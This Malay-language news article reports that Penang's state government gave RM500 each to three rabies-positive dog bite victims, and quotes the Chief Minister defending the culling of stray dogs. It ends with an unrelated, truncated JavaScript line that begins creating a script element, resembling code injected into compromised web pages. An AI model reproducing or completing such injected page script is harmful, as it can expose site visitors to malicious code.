Mangsa gigitan positif virus rabies terima sumbangan

GEORGE TOWN – Tiga mangsa gigitan anjing yang disahkan pembawa virus anjing gila atau rabies, masing-masing menerima sumbangan bernilai RM500 daripada Kerajaan Negeri, di sini baru-baru ini.

Sumbangan tersebut disampaikan Ketua Menteri, Y.A.B. Tuan Lim Guan Eng dalam suatu majlis ringkas yang turut dihadiri barisan kepimpinan Kerajaan Negeri.

Ketika berucap, Guan Eng berkata, Kerajaan Negeri memandang serius insiden gigitan anjing yang bukan sahaja mengundang keresahan umum, malah lebih berisiko sekiranya ia tidak dibendung dengan segera.

Malah, tegasnya, rakyat perlu memahami keputusan yang diambil Kerajaan Negeri untuk menakai (culling) anjing-anjing liar dan terbiar, merupakan satu tindakan yang serius kerana wabak rabies boleh mengundang risiko (kematian) kepada semua.

“Oleh itu, saya harap isu ini dapat dilihat secara rasional dengan menggunakan logik dan bukannya beremosi,” katanya.

Hadir sama, Timbalan Ketua Menteri II, Prof. Dr. P. Ramasamy; Exco Pertanian & Industri Asas Tani, Pembangunan Desa dan Kesihatan, Dr. Afif Bahardin, Exco Kebajikan, Masyarakat Penyayang dan Alam Sekitar, Phee Boon Poh dan Pakar Perunding Kesihatan Awam Kawalan Penyakit Berjangkit Jabatan Kesihatan Negeri Pulau Pinang, Dr. Saraswathi Bina Rai.

Jelas Guan Eng, sungguhpun keputusan yang diambil Kerajaan Negeri disifatkan sebagai tindakan ‘berani’ oleh sesetengah pihak, namun, tegasnya, sebagai seorang Ketua Menteri, beliau bertanggungjawab terhadap semua rakyat termasuk mangsa-mangsa gigitan anjing gila.

Mengulas lanjut, beliau memberitahu,Kerajaan Negeri bukan sahaja mengambil langkah pengawalan wabak melalui penakaian, tetapi juga turut melaksanakan pemvaksinan anjing-anjing peliharaan bagi mencegah jangkitan rabies dan pendidikan awam meliputi kawasan perumahan, kampung dan perindustrian.

“Pada masa sama, kita (Kerajaan Negeri) juga menyeru mana-mana badan bukan kerajaan (NGO), orang perseorangan atau aktivis haiwan yang ingin bekerjasama memantau perkembangan wabak ini untuk tampil membantu pegawaipegawai awam (dari Jabatan Perkhidmatan Veterinar, DVS) dan pihak berkuasa tempatan) bagi membendung penularan wabak rabies,” jelasnya.

Sementara itu, mangsa, Mohd. Omar Hussairi Mohd. Yusri, 11, ketika ditemui menceritakan detik-detik cemas digigit anjing pada 13 September lalu.

“Waktu itu, saya dalam perjalanan balik dari sebuah kedai selepas membeli beberapa barang keperluan dapur, kemudian ada seekor anjing datang terus gigit betis,” katanya kepada Buletin Mutiara selepas selesai majlis sidang media di sini.

Bapanya, Mohd. Yusri Mohd. Hashim, 39, yang bekerja sebagai pemandu bas terus bergegas pulang dan membawa anaknya ke Hospital Balik Pulau.

“Sangat risau, masa itu tak tahu pun tentang penyakit ni, setelah anjing tu ditangkap, pihak hospital memberitahu, anjing tu positif rabies.

“Sekarang ni, bukan sahaja dia yang trauma dan takut, saya sendiri pun takut nak biar anakanak keluar rumah.” ujarnya.

Selain ditahan di wad selama dua hari, Mohd. Omar yang merupakan anak sulung daripada empat beradik juga perlu mendapatkan enam suntikan setiap empat hari bagi mengelakkan penularan virus rabies.

Turut berkongsi pengalaman, S. Prabagan, 31, yang bertugas di Unit Perkhidmatan Veterinar, Majlis Perbandaran Seberang Perai (MPSP).

“Saya digigit sewaktu menjalankan operasi penakaian anjing liar, tiba-tiba anjing tu melompat dan menggigit kaki kanan saya, saya tak sempat berbuat apa-apa,” kata beliau.

Seorang lagi mangsa terlibat, warga emas berusia 65 tahun, Lee Gam Chai yang berasal dari Sungai Pinang, Balik Pulau.

var d=document;var s=d.createElement(‘script’);